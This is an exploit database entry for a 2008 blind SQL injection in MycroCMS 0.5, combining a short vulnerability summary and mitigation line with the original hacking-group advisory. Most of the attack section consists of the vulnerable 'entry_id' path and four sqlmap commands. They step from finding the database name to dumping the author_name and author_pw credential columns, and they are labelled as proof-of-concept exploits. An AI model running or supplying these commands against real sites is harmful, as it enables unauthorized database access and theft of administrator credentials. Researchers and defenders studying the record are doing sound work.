MycroCMS 0.5 Remote Blind SQL Injection Vulnerability

vendor:

MycroCMS

by:

CWH Underground

8.8

CVSS

HIGH

Remote Blind SQL Injection

CWE

Product Name: MycroCMS

Affected Version From: 0.5

Affected Version To: 0.5

Patch Exists: NO

Related CWE: N/A

CPE: a:mycrocms:mycrocms:0.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

MycroCMS 0.5 Remote Blind SQL Injection Vulnerability

MycroCMS 0.5 is vulnerable to a Remote Blind SQL Injection vulnerability. This vulnerability can be exploited by an attacker to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'entry_id' parameter. An attacker can send a malicious SQL query to the vulnerable parameter and gain access to the database. The exploit requires the 'magic_quotes_gpc' to be disabled.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

=======================================================
 MycroCMS 0.5 Remote Blind SQL Injection Vulnerability 
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 11 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MycroCMS
 VERSION     : 0.5 (Lastest Version)
 DOWNLOAD    : http://downloads.sourceforge.net/mycrocms
#####################################################

---Remote Blind SQL Injection---

***magic_quotes_gpc = off***

-----------------
 Vulnerable Path
-----------------

[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]


---------------------------------
 Blind SQL Injection with SqlMap
---------------------------------

[+] Find DB name
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Tables (Use Database "mycrocms")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Columns in Table (Use Table "mbauthor")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3

[+] Dump All Data in Column (Use Column "author_name" and "author_pw")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-11]